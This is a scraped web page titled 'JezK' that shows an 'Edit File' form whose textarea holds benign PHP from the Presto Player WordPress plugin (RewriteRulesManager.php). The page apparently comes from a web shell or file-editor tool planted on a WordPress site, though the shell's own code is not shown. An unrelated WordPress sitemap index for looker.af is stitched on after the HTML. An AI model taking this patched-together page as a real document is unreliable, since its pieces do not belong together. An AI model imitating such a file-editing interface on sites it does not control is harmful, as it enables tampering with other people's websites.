
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<title>JezK</title>
<style>
    body {
        font-family: Arial, sans-serif;
        margin: 0;
        padding: 0;
    }
    #container {
        max-width: 800px;
        margin: 20px auto;
        padding: 20px;
        border: 1px solid #ccc;
        border-radius: 5px;
        background-color: #f9f9f9;
    }
    h1 {
        text-align: center;
        color: #333;
    }
    h2 {
        margin-top: 30px;
        color: #555;
    }
    ul {
        list-style-type: none;
        padding: 0;
    }
    li {
        margin-bottom: 10px;
    }
    a {
        text-decoration: none;
        color: #007bff;
    }
    a:hover {
        text-decoration: underline;
    }
    form {
        margin-top: 20px;
    }
    input[type="text"], input[type="file"], input[type="submit"] {
        margin-bottom: 10px;
    }
    hr {
        border: 0;
        height: 1px;
        background-color: #ccc;
        margin-top: 20px;
        margin-bottom: 20px;
    }
</style>
</head>
<body>
<div id="container">
    <h1>JezK</h1>
    <h2>Edit File: RewriteRulesManager.php</h2><form method="post"><textarea name="file_content" rows="10" cols="50">&lt;?php

namespace PrestoPlayer\Services;

use PrestoPlayer\Plugin;

/**
 * The RewriteRulesManager service.
 */
class RewriteRulesManager {


	/**
	 * The option name for the stored version.
	 *
	 * @var string
	 */
	protected $option_name = &#039;presto_flush_rewrite_rules&#039;;

	/**
	 * Bootstraps the service.
	 *
	 * @return void
	 */
	public function bootstrap() {
		add_action( &#039;admin_init&#039;, array( $this, &#039;flushRewriteRulesOnVersionChange&#039; ) );
	}

	/**
	 * Retrieves the stored version from the WordPress options.
	 *
	 * @return string The stored version.
	 */
	public function getStoredVersion() {
		return get_option( $this-&gt;option_name, &#039;0.0.0&#039; );
	}

	/**
	 * Retrieves the current plugin version.
	 *
	 * @return string The current plugin version.
	 */
	public function getCurrentPluginVersion() {
		return Plugin::version();
	}

	/**
	 * Flushes the rewrite rules if the plugin version has changed.
	 *
	 * @return bool|void Returns false if the versions are the same, otherwise void.
	 */
	public function flushRewriteRulesOnVersionChange() {
		$current_version = $this-&gt;getCurrentPluginVersion();
		$stored_version  = $this-&gt;getStoredVersion();

		if ( ! $this-&gt;isVersionDifferent( $current_version, $stored_version ) ) {
			return false;
		}

		return $this-&gt;flushRewriteRulesAndUpdateVersion( $current_version );
	}

	/**
	 * Checks if the current plugin version is different from the stored version.
	 *
	 * @param string $current_version The current plugin version.
	 * @param string $stored_version The stored plugin version.
	 *
	 * @return bool True if the versions are different, false otherwise.
	 */
	public function isVersionDifferent( $current_version, $stored_version ) {
		return version_compare( $current_version, $stored_version, &#039;!=&#039; );
	}

	/**
	 * Flushes the rewrite rules and updates the stored version.
	 *
	 * @param string $new_version The new plugin version.
	 *
	 * @return void
	 */
	public function flushRewriteRulesAndUpdateVersion( $new_version ) {
		flush_rewrite_rules();
		return update_option( $this-&gt;option_name, $new_version, false );
	}
}
</textarea><br><input type="submit" value="Save"></form></div>
</body>
</html>

<?xml version="1.0" encoding="UTF-8"?>
<?xml-stylesheet type="text/xsl" href="https://looker.af/wp-sitemap-index.xsl" ?>
<sitemapindex xmlns="http://www.sitemaps.org/schemas/sitemap/0.9"><sitemap><loc>https://looker.af/wp-sitemap-posts-post-1.xml</loc></sitemap><sitemap><loc>https://looker.af/wp-sitemap-posts-page-1.xml</loc></sitemap><sitemap><loc>https://looker.af/wp-sitemap-taxonomies-category-1.xml</loc></sitemap><sitemap><loc>https://looker.af/wp-sitemap-users-1.xml</loc></sitemap></sitemapindex>
